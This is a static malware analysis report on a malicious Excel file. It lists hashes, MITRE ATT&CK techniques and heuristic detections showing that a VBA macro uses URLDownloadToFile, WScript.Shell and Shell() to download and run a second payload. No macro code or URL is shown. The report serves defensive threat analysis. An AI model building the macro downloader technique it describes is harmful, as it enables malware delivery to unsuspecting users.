Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 410512e7b674fd30…

MALICIOUS

Office (OLE) / .XLS

106.0 KB Created: 2023-02-16 07:32:17 Authoring application: Microsoft Excel First seen: 2023-02-22
MD5: f7df1ff7b85d9de16d95933b8031e883 SHA-1: 886d69306b66b2247d1740638c20881d0518716e SHA-256: 410512e7b674fd30371d8e8d6f57d65761e054bc85fd0635828526428a92b550
348 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059.003 Windows Command Shell

The sample is an Excel file containing VBA macros. Critical heuristics indicate the use of URLDownloadToFile, WScript.Shell, and Shell() calls, suggesting the macro is designed to download and execute a secondary payload. The script attempts to obfuscate the download URL, but the presence of URLDownloadToFile API calls is a strong indicator of this behavior. No specific family could be identified.

Heuristics 8

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
7f59bf905f2f78fa620b7eb0d7eb19ede3bd06a8d9339021c43d4c9d535a23cf		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 2448 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.